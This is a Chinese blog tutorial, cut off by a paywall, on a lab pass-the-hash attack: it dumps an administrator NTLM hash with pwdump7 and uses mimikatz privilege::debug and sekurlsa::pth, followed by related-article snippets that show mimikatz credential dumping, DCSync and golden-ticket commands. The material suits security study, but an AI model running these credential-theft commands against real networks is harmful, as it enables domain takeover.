使用mimikatz利用哈希传递获取域控权限

最新推荐文章于 2025-03-13 16:32:37 发布
最新推荐文章于 2025-03-13 16:32:37 发布
阅读量1.1k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 内网渗透 文章标签: 频域 哈希
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_54713392/article/details/118343438

使用mimikatz利用哈希传递获取域控权限

靶机 window server 2012 IP 192.168.1.22
攻击机 window7 IP 192.168.1.34
(1)win2012 server获取目标hash对应用户名administrator,500,获取目标的NTLM哈希值可以使用mimikatz或者pwdump7
使用pwdump7,执行命令Pwdump7.exe
在这里插入图片描述

导出信息到1.txt中
在这里插入图片描述

复制出ntlm

CE28B42F9943D0552385BC5F6338F9B9

(2)在攻击机上管理员权限打开mimikatz
找到mimikatz对应的位置,执行命令mimikatz.exe
在这里插入图片描述

提权执行privilege::debug
在这里插入图片描述

再执行sekurlsa::pth /user:administrator /domain:demo.com /ntlm:CE28B42F9943D0552385BC

最低0.47元/天 解锁文章

200万优质内容无限畅学
内网渗透,横向移动总结(mimikatz
墨痕诉清风的博客
08-23 3254
前言 通常我们在渗透过程中从外围打点进入内网后拿到主机提升到system权限,这一台主机就已经拿下。但是我们进入内网的目标还是拿下尽可能多的主机,这时候选择横向移动的方法就尤为重要。今天就对一些常用的横向手法进行一个总结,有不足之处欢迎师傅们进行斧正。 本次实验均在本地搭建靶场进行,靶场拓扑图如下: 利用windows远程连接命令 ipc连接 IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的
哈希传递攻击(Pass-the-Hash)
热门推荐
whoim_i的博客
12-25 1万+
目录使用msf进行哈希传递攻击使用mimikatz进行哈希传递攻击PTH(工作组) 使用msf进行哈希传递攻击 有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口(文件共享)打开着。我们则可以利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(注意:只能是adminis...
网络安全内用户Hash获取方式
kali_Ma的博客
12-05 1569
在渗透测试的过程中,当我们已经是权限时,就可以实现提取所有内用户的密码哈希以进行离线破解和分析,这是非常常见的一个操作,这些哈希值存储在制器(NTDS.DIT)中的数据库文件中,并带有一些其他信息,如用户名、散列值、组、GPP、OU等于活动目录相关的信息,它和SAM文件一样都是被操作系统锁定的,因此无法直接复制到其他位置以提取信息。NTDS.dit文件位于Windows以下位置: NTDSUTIL是一个命令行工具,它是制器生态系统的一部分,其目的是为了使管理员能够访问和管理Windows Ac
mimikatz hash传递--获取权限
qq_46635165的博客
10-18 2528
mimikatz hash传递获取权限 实验环境 实验环境:win_server2012 ip:192.168.3.132 (内普通用户,有本地管理员权限,但不知明文密码) win_server2008 ip:192.168.3.133 (DC,与server2012管理员密码相同,但不知明文密码) 此时,你已经拿下了内一普通用户win_server2012 实验步骤 1,将mimikatz上传至win_server2012; 2,cd 至mimikatz目录; 3,使用reg命令,将注册表
内网横向移动|哈希传递PTH|mimikatz使用
qq_60115503的博客
04-25 6014
Mimikatz是法国人benjamin开发的一款强大的轻量级调式工具,本意是用来个人测试,但由于其功能强大,能够直接读取Windows-XP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具
获取的方法
2301_76786857的博客
01-19 2060
渗透中、作为渗透测试人员,获取权限基本上可以获取整个内网的权限
【渗透测试笔记】之【内网渗透——横向移动:使用mimikatz和CS进行哈希传递攻击】
AA8j的博客
11-15 4365
文章目录1. mimikatz1.1 NTLM Hash传递攻击1.2 AES-256 哈希传递攻击2. CS2.1 获得一个Beacon2.2 dump Hash2.2.1 方法一2.2.2 方法二2.2.3 查看2.3 哈希传递攻击 1. mimikatz 地址:https://github.com/gentilkiwi/mimikatz 1.1 NTLM Hash传递攻击 首先获得管NTLM Hash:【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
weixin_45715461的博客
06-05 1681
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
CS和msf的权限传递利用mimikatz抓取win10明文密码
繁星
06-02 1561
安装CobaltStrike,浏览博主的上篇文章即可!!!这里我在自己的本机win11上执行了Client去连接kali中的Server端,直接执行.cmd文件即可!!!
哈希传递(PTH)
A526847的博客
05-31 1629
假设这么一种情况,我们已拿到的内所有的账户Hash,包括 krbtgt账户,由于有些原因导致你对权限丢失,但好在你还有一个普通用户权限,碰巧管理员在 内加固时忘记重置krbtgt密码,基于此条件,我们还能利用该票据重新获得管理员权限利用krbtgt的 HASH值可以伪造生成任意的TGT(mimikatz),能够绕过对任意用户的账号策略,让用户成为任意组的成 员,可用于Kerberos认证的任何服务。白银票据就是伪造的ST。但是普通的金票不能够跨使用,也就是说金票的权限被限制在当前内。
内网渗透——哈希传递
来日可期的博客
10-09 1831
哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
mimikatz使用哈希 ntlm传递 票据传递
YouthBelief的博客
12-16 2547
(1)管理员运行 (2)必须输入 privilege::debug (3)在目标主机使用mimikatz获取ntlm hash winserver 2012R2 之前版本 可以获取到明文密码 sekurlsa::logonpasswords (4) 哈希传递哈希传递到其他计算机上 进行登录验证 sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6
内网渗透测试小Demo-哈希传递攻击
Love&Share
11-26 2468
文章目录环境搭建Win Server2003Win Server2008拿shell收集信息哈希传递攻击mimikatz推荐阅读 环境搭建 Win Server2003 设置账户密码 右击我的电脑,选择管理,添加本地用户和组,重置admin的密码为123456,方便之后的操作 在vmware中为虚拟机添加一个网卡,网络连接选择LAN区段 开机后手动设置IP地址为 10.0.0.2/24 ipconfig Win Server2008 虚拟机网络连接选择LAN区段,开机后手动设置IP地址为 10.0.
内网渗透工具mimikatz使用
qq_64787896的博客
03-24 1579
上执行)查看kevin.com内指定用户root的详细信息,包括NTLM哈希等 lsadump::dcsync /domain:kevin.com /user:root (在上执行)读取所有用户的哈希 lsadump::lsa /patch 从sam.hive和system.hive文件中获得NTLM Hash lsadump::sam /sam:sam.hive /system:system.hive 从本地SAM文件中读取密码哈希 token::elevate lsadump::sam。
WINDOWS 窃取hash实现远程登录
The current road is different, love needs to distinguish between right and wrong
11-18 1062
前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 一、Windows常用用户 SYSTEM: #本地机器上拥有最高权限的用户。 Administrator: #本地机器上拥有最高权限的用户。 Guest: # 只拥有相对较少的权限,默认被禁用。 二、Windows密码安全 1. Quarks P...
渗透之明文传递&hash传递
qq_55202378的博客
05-16 718
在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?这里提供一条思路:在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。mimikaze抓取windows用户名、密码。建立IPC常见的错误代码。
渗透测试的渗透之哈希传递攻击PTH
没有网络安全就没有国家安全
03-13 1591
渗透测试的渗透之哈希传递攻击PTH
windows获取hash常见手法,你知道吗?
logic1001的博客
03-22 2144
有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!适用于Windows 8.1 和 Windows Server 2012 R2 之前Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储可以读到hash所有我们要修改注册表将 UseLogonCredential 设置为 1 然后重启再用猕猴桃就可以获取到密码了。
bat 远程桌面登陆 命令_内网渗透之命令行渗透 渗透红队笔记
weixin_39653766的博客
11-26 1037
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 19 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更内网渗透在内网渗透的时候,如果想要登录远程桌面,会容易暴露自己,所以尽可能学会使用命令行操作会在渗透实际过程中有很大的帮助。命令行渗透IPC$建立ipc连接以后,就可以访问目标机器的文件(上传、下载),也可以在目标机器 上运行命令...
Mimikatz
最新发布
03-19
利用的KRBTGT账户哈希伪造Kerberos票据,获取管理员权限: ```bash mimikatz # kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /krbtgt:<KRBTGT_HASH> /ptt ``` #### 二、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值